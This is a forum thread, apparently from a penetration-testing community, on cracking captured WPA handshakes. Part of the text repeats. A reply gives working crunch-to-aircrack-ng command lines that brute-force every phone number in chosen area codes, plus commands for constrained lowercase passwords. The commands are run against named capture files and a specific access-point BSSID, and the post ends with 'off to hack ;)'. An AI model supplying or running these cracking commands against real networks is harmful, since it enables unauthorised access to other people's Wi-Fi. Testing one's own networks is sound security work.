This is interesting, as when I brute forced my capture using the dual 1.1 CPU in my HP 2510p laptop, I had a password of a 10digit phone # and a dictionary of all the phone numbers for my area code. I recall that crack taking ~1 day. Still have yet to try a crack with my 8400GS video card. Heck, not even sure if it's possible?
Yes, I find _LOTS_ of people will use a phone number as a password... Why would you brute 0000000000 to 9999999999? Of course it takes long...
HERE is a TIP on cracking a password that is a phone number:
Write down each area code that is common in your area (for me its 905, 416, 647, 289). You will open one "crunch" and "aircrack-ng for each area code. Example:
Each one of those will brute EVERY phone number within that area code, and it takes me around 30 mins (I have a AMD PHENOM XII 6 core processor). I don't see why anyone would brute 0000000000 - 9999999999 or even use a dictionary of phone numbers.... Pointless and WAY tooo long...
HERE is a TIP on cracking AlphaNumeric Pass:
The first command will make sure it has a different letter/number each char space. Ex. the next line will not try "aaaaa" but will try "ababab" -- it will not allow a duplicate char beside the current char.
The second command will make sure it has no more than two chars in a row. Ex. the next line will try "aabcd" but will NOT try "ababab" -- it will not allow a duplicate char beside the current char.
Wpa Handshake
in Questions
Posted
Yes, I find _LOTS_ of people will use a phone number as a password... Why would you brute 0000000000 to 9999999999? Of course it takes long...
HERE is a TIP on cracking a password that is a phone number:
Write down each area code that is common in your area (for me its 905, 416, 647, 289). You will open one "crunch" and "aircrack-ng for each area code. Example:
/pentest/passwords/crunch/crunch 10 10 "0123456789" -s 9050000000 -e 9060000000 -u | aircrack-ng -p 6 -b 68:15:90:43:10:62 -w - -l KEY_dlink_KEY dlink_dump-01.cap
/pentest/passwords/crunch/crunch 10 10 "0123456789" -s 4160000000 -e 4170000000 -u | aircrack-ng -p 6 -b 68:15:90:43:10:62 -w - -l KEY_dlink_KEY dlink_dump-01.cap
/pentest/passwords/crunch/crunch 10 10 "0123456789" -s 6470000000 -e 6480000000 -u | aircrack-ng -p 6 -b 68:15:90:43:10:62 -w - -l KEY_dlink_KEY dlink_dump-01.cap
/pentest/passwords/crunch/crunch 10 10 "0123456789" -s 2890000000 -e 2900000000 -u | aircrack-ng -p 6 -b 68:15:90:43:10:62 -w - -l KEY_dlink_KEY dlink_dump-01.cap
Each one of those will brute EVERY phone number within that area code, and it takes me around 30 mins (I have a AMD PHENOM XII 6 core processor). I don't see why anyone would brute 0000000000 - 9999999999 or even use a dictionary of phone numbers.... Pointless and WAY tooo long...
HERE is a TIP on cracking AlphaNumeric Pass:
The first command will make sure it has a different letter/number each char space. Ex. the next line will not try "aaaaa" but will try "ababab" -- it will not allow a duplicate char beside the current char.
/pentest/passwords/crunch/crunch 5 10 "abcdefghijklmnopqrstuvwxyz" -d 1@ -u | aircrack-ng -p 6 -b 68:15:90:43:10:62 -w - -l KEY_BELL617_KEY BELL617_dump-01.cap
The second command will make sure it has no more than two chars in a row. Ex. the next line will try "aabcd" but will NOT try "ababab" -- it will not allow a duplicate char beside the current char.
/pentest/passwords/crunch/crunch 5 10 "abcdefghijklmnopqrstuvwxyz" -d 2@ -u | aircrack-ng -p 6 -b 68:15:90:43:10:62 -w - -l KEY_BELL617_KEY BELL617_dump-01.cap
off to hack ;)